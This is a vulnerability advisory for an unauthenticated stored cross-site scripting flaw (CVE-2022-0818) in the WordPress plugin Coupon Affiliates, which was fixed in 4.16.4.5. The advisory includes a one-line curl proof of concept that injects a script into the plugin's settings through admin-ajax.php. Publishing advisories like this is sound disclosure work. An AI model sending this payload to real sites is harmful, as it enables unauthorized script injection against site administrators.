Coupon Affiliates < 4.16.4.5 – Unauthenticated Stored XSS | CVE 2022-0818 | Plugin Vulnerabilities

Description

The plugin does not have authorization and CSRF checks on a specific action handler, as well as does not sanitize its settings, which enables an unauthenticated attacker to inject malicious XSS payloads into the settings page of the plugin.

Proof of Concept

curl https://example.com/wp-admin/admin-ajax.php --data 'action=wcu-update-text&option=wcusage_field_orders&value="></input><script>alert("xss");</script><input'

The XSS will be triggered in the Settings page of the plugin (/wp-admin/admin.php?page=wcusage_settings)

Affects Plugins

woo-coupon-usage

Fixed in 4.16.4.5

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

c43fabb4-b388-462c-adc4-c6b25af7043b

Timeline

Publicly Published

2022-03-02 (about 2 years ago)

Added

2022-03-02 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2019-07-03

Title

MyBookTable <= 3.2.2 - Multiple XSS

Published

2024-03-25

Title

Travelers' Map < 2.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2014-08-01

Title

ed2k-link-selector <= 1.1.7 - XSS in ZeroClipboard

Published

2024-03-15

Title

User profile < 2.0.21 - Authenticated (Subscriber+) Stored Cross-Site Scripting

Published

2016-11-08

Title

WassUp Real Time Analytics <= 1.9 - Cross Site Scripting